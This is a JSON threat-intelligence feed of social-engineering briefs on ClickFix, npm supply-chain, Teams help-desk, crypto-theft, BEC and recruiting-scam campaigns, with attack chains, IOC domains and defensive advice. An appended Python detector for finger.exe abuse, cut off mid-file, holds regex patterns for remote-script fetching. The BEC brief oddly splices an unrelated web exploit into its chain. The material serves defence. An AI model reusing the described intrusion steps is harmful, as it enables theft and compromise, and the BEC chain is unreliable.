{"description":"Trending threats, MITRE ATT\u0026CK coverage, and detection metadata — refreshed continuously.","feed_url":"https://feed.craftedsignal.io/tags/social-engineering/","home_page_url":"https://feed.craftedsignal.io/","items":[{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Atomic macOS Stealer (AMOS)"],"_cs_severities":["high"],"_cs_tags":["malware","social-engineering","ai-platforms"],"_cs_type":"advisory","_cs_vendors":["Hugging Face","Acronis"],"content_html":"\u003cp\u003eThreat actors are abusing AI distribution platforms such as Hugging Face and ClawHub to distribute malware, using social engineering to persuade users to download files that carry malicious code. Rather than compromising AI agents directly, the attackers exploit users\u0026rsquo; trust in these platforms and plant indirect prompt injections in resources that an agent later reads. Acronis reported that on ClawHub nearly 600 malicious skills across 13 developer accounts were distributing trojans, cryptominers, and information stealers targeting both Windows and macOS. On Hugging Face, attackers created repositories hosting malicious files that stage multi-step infection chains ending in infostealers, trojans, malware loaders, and other malware targeting Windows, Linux, and Android. 
This lets attackers sidestep traditional security controls and borrow the platforms\u0026rsquo; reputation for trusted AI tooling.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eThe attacker creates a malicious repository or skill on Hugging Face or ClawHub.\u003c/li\u003e\n\u003cli\u003eThe repository or skill contains files that appear legitimate but include malicious code.\u003c/li\u003e\n\u003cli\u003eThe attacker uses social engineering to entice users to download the files.\u003c/li\u003e\n\u003cli\u003eUpon execution, the malicious code fetches additional payloads from external sources.\u003c/li\u003e\n\u003cli\u003eOn macOS, the payload can be Atomic macOS Stealer (AMOS).\u003c/li\u003e\n\u003cli\u003eThe downloaded payload runs commands to install hidden dependencies.\u003c/li\u003e\n\u003cli\u003eThe malware establishes persistence on the victim\u0026rsquo;s system.\u003c/li\u003e\n\u003cli\u003eThe malware carries out its objective, such as stealing information or mining cryptocurrency.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful attacks can lead to the installation of various types of malware, including infostealers, trojans, cryptominers, and malware loaders. The targeted platforms include Windows, macOS, Linux, and Android, potentially impacting a wide range of users and systems. The abuse of trust in AI distribution platforms poses a significant risk, because users tend to scrutinize files from these sources less closely than an arbitrary download. 
Acronis identified close to 600 malicious skills on ClawHub alone, indicating the scale of this threat.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eMonitor process creation events for execution of downloaded files from Hugging Face or ClawHub with unusual parent processes using the \u0026ldquo;Detect Suspicious Process Execution from AI Platforms\u0026rdquo; Sigma rule.\u003c/li\u003e\n\u003cli\u003eImplement network monitoring to detect connections to known malicious domains or IPs associated with malware distribution campaigns that originate from processes associated with AI platform tooling.\u003c/li\u003e\n\u003cli\u003eEducate users about the risks of downloading files from untrusted sources, even on trusted platforms like Hugging Face and ClawHub.\u003c/li\u003e\n\u003cli\u003eRegularly scan systems for known malware signatures and indicators of compromise associated with infostealers and trojans.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-05-01T08:41:57Z","date_published":"2026-05-01T08:41:57Z","id":"/briefs/2026-05-huggingface-clawhub-malware/","summary":"Threat actors are using social engineering to distribute malware via AI distribution platforms such as Hugging Face and ClawHub by tricking users into downloading malicious files, which leads to malware infections on Windows, macOS, Linux, and Android systems.","title":"Malware Distribution via Hugging Face and ClawHub","url":"https://feed.craftedsignal.io/briefs/2026-05-huggingface-clawhub-malware/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Microsoft Windows","Microsoft 365","Google Workspace"],"_cs_severities":["high"],"_cs_tags":["clickfix","malware","social-engineering","rat","infostealer","castleloader","netsupport"],"_cs_type":"advisory","_cs_vendors":["Microsoft"],"content_html":"\u003cp\u003eThe BackgroundFix campaign is a social engineering scheme using fake \u0026ldquo;remove your photo 
background\u0026rdquo; services to deliver malware. Victims are lured to malicious sites mimicking legitimate image editing tools. The sites feature fake upload interfaces, progress bars, and download buttons to appear authentic. The campaign delivers a multi-stage payload that starts with CastleLoader. CastleLoader then drops NetSupport RAT, which gives the attackers remote access, and CastleStealer, a custom .NET stealer built to exfiltrate browser credentials, wallet extension data, and Telegram session files. The campaign appears to be active, with multiple domains sharing the same template.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eThe victim searches for an online background removal tool and lands on a malicious BackgroundFix site.\u003c/li\u003e\n\u003cli\u003eThe victim uploads an image to the fake website.\u003c/li\u003e\n\u003cli\u003eAfter the victim clicks a checkbox, the site instructs them to copy a command to the clipboard and run it, the ClickFix pattern.\u003c/li\u003e\n\u003cli\u003eThe copied command runs \u003ccode\u003efinger.exe\u003c/code\u003e to query \u003ccode\u003echeeshomireciple[.]com\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003efinger.exe\u003c/code\u003e retrieves a batch script from the C2 server over the finger protocol (TCP/79), a legacy channel that egress filtering rarely covers.\u003c/li\u003e\n\u003cli\u003eThe batch script downloads and executes further payloads.\u003c/li\u003e\n\u003cli\u003eCastleLoader is deployed and in turn drops NetSupport RAT and CastleStealer.\u003c/li\u003e\n\u003cli\u003eNetSupport RAT grants the attacker remote access, while CastleStealer exfiltrates sensitive data.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful attacks result in the installation of NetSupport RAT, granting attackers remote control over the compromised system. 
Additionally, CastleStealer exfiltrates sensitive information such as browser credentials, wallet extension data, and Telegram session files. This stolen data can be used for further malicious activity, including financial fraud, identity theft, and unauthorized access to sensitive accounts. The active nature of the campaign and the use of multiple domains suggest a broad targeting scope.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eMonitor process creation events for the execution of \u003ccode\u003efinger.exe\u003c/code\u003e with command-line arguments pointing to external domains (IOC: \u003ccode\u003echeeshomireciple[.]com\u003c/code\u003e).\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule for \u003ccode\u003efinger.exe\u003c/code\u003e execution to identify initial access attempts. The binary has almost no legitimate use on modern Windows endpoints, so any execution is worth triage, and output piped into \u003ccode\u003ecmd\u003c/code\u003e or \u003ccode\u003epowershell\u003c/code\u003e, or a parent of \u003ccode\u003eexplorer.exe\u003c/code\u003e (a pasted Run-dialog command), is a strong ClickFix signal.\u003c/li\u003e\n\u003cli\u003eBlock the C2 domain \u003ccode\u003echeeshomireciple[.]com\u003c/code\u003e at the DNS resolver to prevent initial payload delivery, and consider blocking outbound TCP/79 at the perimeter where the finger protocol has no business use.\u003c/li\u003e\n\u003cli\u003eMonitor network connections for NetSupport RAT C2 communications on port 688 to detect compromised systems (IOCs: \u003ccode\u003eporonto[.]com:688\u003c/code\u003e, \u003ccode\u003egiovettiadv[.]com:688\u003c/code\u003e).\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-30T13:00:00Z","date_published":"2026-04-30T13:00:00Z","id":"/briefs/2026-04-clickfix-backgroundfix/","summary":"The 'BackgroundFix' ClickFix campaign uses a fake free image-editing tool to trick victims into running a clipboard command that fetches CastleLoader, which deploys NetSupport RAT for remote access and CastleStealer for credential theft.","title":"ClickFix 'BackgroundFix' Campaign Delivers CastleLoader, NetSupport RAT, and 
CastleStealer","url":"https://feed.craftedsignal.io/briefs/2026-04-clickfix-backgroundfix/"},{"_cs_actors":["UNC6692"],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Microsoft Teams","Chromium"],"_cs_severities":["high"],"_cs_tags":["social-engineering","malware","cloud-abuse","credential-theft","lateral-movement"],"_cs_type":"threat","_cs_vendors":["Microsoft","Google","Amazon"],"content_html":"\u003cp\u003eUNC6692 is a newly tracked, financially motivated threat group that employs a multi-stage intrusion campaign combining persistent social engineering and custom modular malware. The actor begins by flooding a target\u0026rsquo;s email inbox before contacting them via Microsoft Teams, posing as help desk personnel to resolve the issue. This leads to a phishing attack where victims are tricked into downloading and executing malicious payloads. UNC6692 abuses legitimate cloud infrastructure, specifically AWS S3 buckets, for payload delivery, command and control (C2), and data exfiltration, allowing them to bypass traditional network reputation filters. The group\u0026rsquo;s operations are focused on gaining access and stealing credentials for further actions, ultimately aiming to exfiltrate data of interest from compromised systems. 
The initial campaign was observed in late December.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eThe attacker floods a target\u0026rsquo;s email inbox to create a sense of urgency.\u003c/li\u003e\n\u003cli\u003eThe attacker contacts the target via Microsoft Teams, impersonating help desk personnel.\u003c/li\u003e\n\u003cli\u003eThe attacker sends a phishing link via Teams, promising a local patch to fix the email spamming issue.\u003c/li\u003e\n\u003cli\u003eThe target clicks the link, which downloads a renamed AutoHotkey binary and an AutoHotkey script from a threat actor-controlled AWS S3 bucket.\u003c/li\u003e\n\u003cli\u003eRunning the AutoHotkey binary automatically executes the script, which launches reconnaissance commands and installs the SNOWBELT malicious Chromium browser extension.\u003c/li\u003e\n\u003cli\u003eSNOWBELT facilitates the download of additional tools, including the SNOWGLAZE Python tunneler, the SNOWBASIN Python bindshell (used as a persistent backdoor), further AutoHotkey scripts, and a portable Python executable with the required libraries.\u003c/li\u003e\n\u003cli\u003eThe attacker uses a Python script to scan the local network for ports 135, 445, and 3389 and to enumerate local administrator accounts.\u003c/li\u003e\n\u003cli\u003eUsing a local administrator account, the attacker opens an RDP session through SNOWGLAZE from the compromised system to a backup server, dumps LSASS process memory, and uses pass-the-hash to move laterally to the domain controller.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eThe UNC6692 attack leads to the compromise of targeted systems, credential theft, and potential data exfiltration. If successful, the attacker gains control over the domain controller, allowing them to access sensitive information and potentially cause significant damage to the organization. 
The abuse of AWS S3 buckets allows the threat actor to blend in with legitimate cloud traffic, making detection more difficult. The financial motivation suggests that stolen credentials and data could be used for further malicious activity, such as ransomware attacks or sale on the dark web.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eMonitor for AutoHotkey execution, especially when it follows downloads from unusual locations such as AWS S3 buckets, to detect initial payload execution (see Sigma rule below). Because the binary is renamed, match on the PE version resource (Sysmon\u0026rsquo;s \u003ccode\u003eOriginalFileName\u003c/code\u003e, e.g. \u003ccode\u003eAutoHotkey.exe\u003c/code\u003e) or on file hash rather than on the process name.\u003c/li\u003e\n\u003cli\u003eImplement network monitoring to detect unusual RDP connections initiated from compromised systems to internal servers, as this is a key lateral movement technique used by UNC6692 (see Sigma rule below).\u003c/li\u003e\n\u003cli\u003eMonitor for the installation of new Chromium extensions, especially those not distributed through the Chrome Web Store, as this is how the SNOWBELT malware is deployed.\u003c/li\u003e\n\u003cli\u003eMonitor for the use of Python scripts to scan the local network for open ports (135, 445, 3389) and enumerate local administrator accounts.\u003c/li\u003e\n\u003cli\u003eInvestigate any Microsoft Teams messages delivering links that promise to fix technical problems, as this is the initial social engineering tactic used by UNC6692.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-28T14:00:00Z","date_published":"2026-04-28T14:00:00Z","id":"/briefs/2026-04-unc6692-social-engineering/","summary":"UNC6692 is a newly discovered, financially motivated threat actor that combines social engineering via Microsoft Teams, custom malware named SNOWBELT, and abuse of legitimate AWS S3 cloud infrastructure in its attack campaigns to steal credentials and prepare for data exfiltration.","title":"UNC6692 Combines Social Engineering, Malware, and Cloud 
Abuse","url":"https://feed.craftedsignal.io/briefs/2026-04-unc6692-social-engineering/"},{"_cs_actors":["UNC4736 (Lazarus Group)"],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["critical"],"_cs_tags":["drift-protocol","crypto-theft","north-korea","unc4736","lazarus-group","social-engineering","supply-chain"],"_cs_type":"threat","_cs_vendors":[],"content_html":"\u003cp\u003eOn April 1st, 2026, the Solana-based trading platform, Drift Protocol, experienced a sophisticated attack resulting in the theft of over $280 million. Investigations by Elliptic and TRM Labs point to North Korean hackers, possibly UNC4736 (also known as AppleJeus and Labyrinth Chollima), a threat actor previously linked to Lazarus. The attackers cultivated a presence within the Drift ecosystem over six months, posing as a quantitative firm. They approached Drift contributors in person at multiple crypto conferences, building trust and rapport. Communications continued via Telegram, where they discussed trading strategies and potential vault integrations, demonstrating technical proficiency and familiarity with Drift\u0026rsquo;s operations. 
The Telegram group was deleted immediately after the theft.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003e\u003cstrong\u003eInitial Reconnaissance:\u003c/strong\u003e The threat actors posed as a quantitative firm to gather information about Drift Protocol and its contributors.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eIn-Person Engagement:\u003c/strong\u003e The actors attended multiple crypto conferences, engaging with specific Drift contributors.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eRelationship Building:\u003c/strong\u003e They communicated with targets via Telegram, discussing trading strategies and potential vault integrations.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003ePotential Compromise:\u003c/strong\u003e Two contributors were potentially compromised via a malicious code repository exploiting a VSCode/Cursor vulnerability allowing silent code execution, or via a malicious TestFlight application presented as a wallet product.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003ePrivilege Escalation:\u003c/strong\u003e The attack allowed the hijacking of the Security Council administrative powers.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eAsset Draining:\u003c/strong\u003e The attackers drained user assets in approximately 12 minutes.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eData Removal:\u003c/strong\u003e The Telegram group used for engaging contributors was deleted immediately after the theft.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eFunds Laundering:\u003c/strong\u003e The stolen funds were likely transferred to attacker-controlled wallets and prepared for laundering, though the wallets have been flagged across exchanges and bridge operators.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eThe Drift Protocol suffered a loss of over $280 million, impacting users of the Solana-based trading platform. 
All Drift Protocol functions remain frozen, and the compromised wallets have been removed from the multisig process. The incident highlights the risks associated with social engineering and the importance of verifying the identities of individuals and organizations interacting with critical infrastructure. The attack has also raised concerns about the security practices within the cryptocurrency sector.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eMonitor for unusual network activity and potential exploitation of VSCode/Cursor vulnerabilities via \u003ccode\u003eprocess_creation\u003c/code\u003e and \u003ccode\u003enetwork_connection\u003c/code\u003e logs using the \u0026ldquo;Detect Suspicious VSCode Code Execution\u0026rdquo; Sigma rule.\u003c/li\u003e\n\u003cli\u003eMonitor for suspicious applications installed via TestFlight, especially those presented as wallet products, using \u003ccode\u003efile_event\u003c/code\u003e logs and the \u0026ldquo;Detect Suspicious TestFlight Application Installation\u0026rdquo; Sigma rule.\u003c/li\u003e\n\u003cli\u003eImplement strict identity verification procedures for individuals and organizations interacting with sensitive systems and data.\u003c/li\u003e\n\u003cli\u003eEducate employees about social engineering tactics and the risks of interacting with unknown individuals or organizations.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-06T16:35:39Z","date_published":"2026-04-06T16:35:39Z","id":"/briefs/2026-04-drift-hack/","summary":"The Drift Protocol suffered a $280 million crypto theft orchestrated by North Korean hackers who spent six months building an in-person operational presence within the Drift ecosystem, engaging with contributors at crypto conferences and via Telegram.","title":"Drift Protocol $280M Crypto Theft Linked to North Korean 
Hackers","url":"https://feed.craftedsignal.io/briefs/2026-04-drift-hack/"},{"_cs_actors":["UNC1069"],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["critical"],"_cs_tags":["supply chain attack","npm","social engineering","rat","unc1069"],"_cs_type":"threat","_cs_vendors":[],"content_html":"\u003cp\u003eOn April 4, 2026, the maintainers of the Axios HTTP client disclosed a social engineering attack targeting one of their developers. The attack, attributed to the North Korean threat actor UNC1069, involved impersonating a legitimate company to build trust with the targeted developer. The attacker used a fake Microsoft Teams update disguised as a critical error fix to deploy a remote access trojan (RAT). This RAT allowed the attackers to gain access to the developer\u0026rsquo;s system and npm credentials. The attackers then published two malicious versions of Axios (1.14.1 and 0.30.4) to the npm package registry. These malicious versions included a dependency called plain-crypto-js, which installed a RAT on macOS, Windows, and Linux systems. 
These versions were available for three hours, posing a supply chain risk to any system that installed them during that window.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eThe attacker identifies a target developer and initiates contact via LinkedIn/Slack, impersonating a legitimate company.\u003c/li\u003e\n\u003cli\u003eThe attacker invites the developer to a Slack workspace populated with fake profiles and staged company activity.\u003c/li\u003e\n\u003cli\u003eA meeting is scheduled on Microsoft Teams, during which a fake \u0026ldquo;RTC Connection\u0026rdquo; error message is displayed.\u003c/li\u003e\n\u003cli\u003eThe attacker prompts the developer to install a \u0026ldquo;Teams update\u0026rdquo; to resolve the error.\u003c/li\u003e\n\u003cli\u003eThe fake update is a RAT, granting the attacker remote access to the developer\u0026rsquo;s machine.\u003c/li\u003e\n\u003cli\u003eThe attacker steals the developer\u0026rsquo;s npm credentials; MFA is bypassed because the attacker rides the developer\u0026rsquo;s already authenticated session instead of logging in afresh.\u003c/li\u003e\n\u003cli\u003eThe attacker publishes malicious versions of the Axios package (1.14.1 and 0.30.4) to the npm registry, injecting the plain-crypto-js dependency.\u003c/li\u003e\n\u003cli\u003eSystems installing the compromised Axios versions download and execute the plain-crypto-js package, resulting in RAT deployment and credential theft.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eThe compromise of the Axios npm package created a supply chain attack impacting an unknown number of systems across various sectors. Systems that installed the malicious versions (1.14.1 and 0.30.4) within the three-hour window should be treated as compromised. Successful exploitation results in the installation of a remote access trojan (RAT) capable of stealing credentials, browser data, and other sensitive information from macOS, Windows, and Linux systems. 
This can lead to further unauthorized access, data breaches, and potential financial loss.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eCheck lockfiles (\u003ccode\u003epackage-lock.json\u003c/code\u003e, \u003ccode\u003eyarn.lock\u003c/code\u003e, \u003ccode\u003epnpm-lock.yaml\u003c/code\u003e) and CI caches, not just live \u003ccode\u003enode_modules\u003c/code\u003e trees, for Axios 1.14.1 or 0.30.4 and for any plain-crypto-js entry; a lockfile records what was actually resolved during the three-hour window even if a fresh install today would pull a clean release.\u003c/li\u003e\n\u003cli\u003eEnforce multi-factor authentication (MFA) on npm and other developer accounts, and prefer short-lived, scoped publish tokens, while recognizing that an already authenticated session can be hijacked, as it was here.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule \u0026ldquo;Detect Suspicious NPM Package Installation\u0026rdquo; to detect potentially malicious package installations based on unusual parent processes (see below).\u003c/li\u003e\n\u003cli\u003eBlock the domain contacted by the malicious plain-crypto-js dependency at the DNS resolver.\u003c/li\u003e\n\u003cli\u003eEducate developers about social engineering tactics and the risks of installing software from untrusted sources.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-04T20:30:42Z","date_published":"2026-04-04T20:30:42Z","id":"/briefs/2026-04-axios-npm-hack/","summary":"North Korean threat actors (UNC1069) compromised the Axios npm package by socially engineering a maintainer with a fake Microsoft Teams update delivering a RAT, leading to the injection of a malicious dependency and a supply chain attack.","title":"Axios npm Package Compromised via Social Engineering","url":"https://feed.craftedsignal.io/briefs/2026-04-axios-npm-hack/"},{"_cs_actors":[],"_cs_cves":[{"cvss":10,"id":"CVE-2025-55182"}],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["medium"],"_cs_tags":["business-email-compromise","bec","ai","social-engineering","credential-harvesting","exploitation"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eBusiness Email Compromise (BEC) attacks have historically targeted large organizations with significant payouts justifying the 
required time investment. However, recent trends indicate a democratization of BEC, with smaller organizations becoming increasingly targeted. This shift is largely driven by the adoption of AI, enabling attackers to rapidly reconnoiter and tailor content for smaller organizations at scale. Attackers are now targeting smaller community associations, charities, and businesses, recognizing that scamming smaller sums from many victims can be as profitable as scamming large sums from a few. These organizations are often less aware of the threat and thus more vulnerable.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003e\u003cstrong\u003eReconnaissance:\u003c/strong\u003e Attackers use AI-powered tools to gather information about target organizations and key personnel (e.g., community associations, small businesses).\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eImpersonation:\u003c/strong\u003e Attackers craft emails impersonating trusted individuals within the organization (e.g., the chair of the association).\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eRequest Initiation:\u003c/strong\u003e The attacker sends an email requesting a fund transfer to an account they control, relying on social engineering to trick someone with payment authority.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eEvasion:\u003c/strong\u003e The initial email is often sent from a plausible email address or a compromised genuine account.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eAccount Compromise:\u003c/strong\u003e Attackers exploit the React2Shell vulnerability (CVE-2025-55182) in Next.js applications to reach sensitive data, including cloud tokens, database credentials, and SSH keys, which are then used for lateral movement.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eData Exfiltration:\u003c/strong\u003e Sensitive data, including cloud tokens, database credentials, and SSH keys, is exfiltrated using a custom framework called 
\u0026ldquo;NEXUS Listener\u0026rdquo;.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eObfuscation:\u003c/strong\u003e Once received, funds typically pass through money mules or compromised personal accounts before being rapidly shuffled through multiple transfers, obscuring the trail.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eFinancial Gain:\u003c/strong\u003e The attacker successfully initiates the fund transfer and receives the money.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eThe democratization of BEC attacks expands the threat landscape to include vulnerable small organizations. While the individual sums may be smaller, the cumulative impact of successful attacks can be significant. If successful, organizations suffer financial losses, potential data breaches through stolen credentials (related to CVE-2025-55182), and reputational damage. The European Commission investigated a breach after an Amazon cloud account hack, highlighting the potential for data leaks.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eEducate employees, especially those with payment authority, about the signs of BEC scams, emphasizing unexpected requests for payment and the importance of verifying requests through separate channels (reference: Overview section).\u003c/li\u003e\n\u003cli\u003eImplement and enforce strict procurement rules that prevent any last-minute urgent payments (reference: Overview section).\u003c/li\u003e\n\u003cli\u003ePatch Next.js applications against React2Shell vulnerability (CVE-2025-55182) immediately and rotate potentially compromised credentials including API keys and SSH keys (reference: \u0026ldquo;The one big thing\u0026rdquo; section).\u003c/li\u003e\n\u003cli\u003eDeploy the following Sigma rule to detect suspicious process creation activity (reference: rules section).\u003c/li\u003e\n\u003cli\u003eMonitor for the presence of 
the malware files identified in the report using the provided SHA256 hashes (reference: IOCs section).\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-03T12:00:00Z","date_published":"2026-04-03T12:00:00Z","id":"/briefs/2026-04-democratized-bec/","summary":"Attackers are leveraging AI to rapidly reconnoiter and tailor content for smaller organizations, making it easier to execute business email compromise (BEC) scams and scam smaller sums from many victims, as demonstrated by a recent attack targeting a small community organization.","title":"Democratization of Business Email Compromise (BEC) Attacks","url":"https://feed.craftedsignal.io/briefs/2026-04-democratized-bec/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["high"],"_cs_tags":["phishing","recruiting","social-engineering","scam"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eSince August 2025, a series of phishing campaigns have impersonated Palo Alto Networks talent acquisition staff, targeting senior-level professionals. The attackers leverage scraped LinkedIn data to craft personalized lures, enhancing the credibility of their outreach. This campaign involves social engineering to manufacture a bureaucratic barrier related to the candidate\u0026rsquo;s resume. The attackers falsely claim that the candidate\u0026rsquo;s resume failed to meet the applicant tracking system (ATS) requirements. 
They then offer to assist the candidate in acquiring a position for a fee, typically ranging from $400 to $800 for services like \u0026ldquo;executive ATS alignment\u0026rdquo; or \u0026ldquo;end-to-end executive rewrite.\u0026rdquo; The goal is to exploit the candidate\u0026rsquo;s professional ambitions by creating a sense of financial urgency and directing them to a third-party \u0026ldquo;expert\u0026rdquo; for paid services.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003e\u003cstrong\u003eInitial Outreach:\u003c/strong\u003e Attackers send personalized emails posing as Palo Alto Networks talent acquisition staff, using flattering language and details from the victim\u0026rsquo;s LinkedIn profile.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eEstablish Rapport:\u003c/strong\u003e The emails use legitimate company logos and signatures to appear authentic and build trust with the targeted professional.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eManufactured Crisis:\u003c/strong\u003e Attackers claim the candidate\u0026rsquo;s resume failed to meet ATS requirements, creating a bureaucratic barrier.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eOffer of Assistance:\u003c/strong\u003e The \u0026ldquo;recruiter\u0026rdquo; offers \u0026ldquo;executive ATS alignment\u0026rdquo; services for a fee, suggesting an urgent need to update the resume.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eHand-off to \u0026ldquo;Expert\u0026rdquo;:\u003c/strong\u003e The candidate is directed to a purported expert who provides structured service offers with specific price points (e.g., $400, $600, $800).\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eTime Pressure:\u003c/strong\u003e The \u0026ldquo;recruiter\u0026rdquo; implies that the \u0026ldquo;review panel\u0026rdquo; has already begun, urging the candidate to update their CV within a limited 
timeframe.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003ePayment Solicitation:\u003c/strong\u003e The \u0026ldquo;expert\u0026rdquo; offers to deliver the CV within hours, fitting the ostensible review window, but only after payment.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eFinancial Exploitation:\u003c/strong\u003e Victims who comply with the demands pay for services that are never delivered, resulting in financial loss and potential identity theft.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eThis phishing campaign targets senior-level professionals, aiming to defraud them of hundreds of dollars through fabricated resume services. Multiple incidents have been reported, indicating a widespread effort to exploit individuals seeking job opportunities. If successful, victims lose money and may expose personal information, potentially leading to further identity theft or fraudulent activities. The campaign undermines trust in legitimate recruiting processes and damages the reputation of Palo Alto Networks.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eImplement email filtering rules to flag messages from the IOC email addresses (paloaltonetworks@gmail[.]com, recruiter.paloalnetworks@gmail[.]com, phillipwalters006@gmail[.]com, posunrayi994@gmail[.]com).\u003c/li\u003e\n\u003cli\u003eMonitor network traffic and DNS queries for connections to domains resembling \u0026ldquo;paloaltonetworks\u0026rdquo; but with slight variations, as mentioned in the overview, and implement blocking where appropriate.\u003c/li\u003e\n\u003cli\u003eEducate employees and potential job candidates about this phishing scheme, emphasizing the importance of verifying recruiter identities and avoiding payment requests during the hiring process.\u003c/li\u003e\n\u003cli\u003eDeploy a Sigma rule to detect emails originating from free email providers (e.g. 
gmail.com) that claim to be from a specific organization based on email content and sender information (see rule below).\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-03-25T12:00:00Z","date_published":"2026-03-25T12:00:00Z","id":"/briefs/2026-03-panw-recruiting-scam/","summary":"Since August 2025, threat actors have been impersonating Palo Alto Networks talent acquisition staff in a sophisticated phishing campaign targeting senior professionals, using social engineering tactics to solicit fraudulent resume fees.","title":"Palo Alto Networks Recruiting Impersonation Phishing Campaign","url":"https://feed.craftedsignal.io/briefs/2026-03-panw-recruiting-scam/"}],"language":"en","title":"CraftedSignal Threat Feed — Social-Engineering","version":"https://jsonfeed.org/version/1.1"}
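Worked example for the BackgroundFix brief above: the detection its first two recommendations describe, run over constructed Sysmon-style process-creation events. This is added here and is not code from the CraftedSignal feed or from the vendor that reported the campaign. The event field names (Image, CommandLine, ParentImage), the parent processes, the command lines and the internal host allow-list are assumptions; the only real indicator reused is the C2 domain the brief publishes.

```python
"""Flag ClickFix-style abuse of finger.exe in process-creation telemetry.

Added example for the BackgroundFix brief; not code from the feed or from the
reporting vendor. Field names follow Sysmon event ID 1 (Image, CommandLine,
ParentImage); the parent processes and command lines below are constructed.
The only real indicator reused is the C2 domain the brief names.
"""
import ipaddress
import ntpath
import re

# "finger" as a standalone token (optionally finger.exe) anywhere in the command line.
FINGER_TOKEN = re.compile(r"(?:^|[\\\s\"'])finger(?:\.exe)?(?=\s|$)", re.I)
# Windows finger syntax is "finger [-l] [user]@host"; pull out the host part.
AT_HOST = re.compile(r"@([A-Za-z0-9.-]+)")
# The ClickFix trick: pipe whatever the remote host returns straight into an interpreter.
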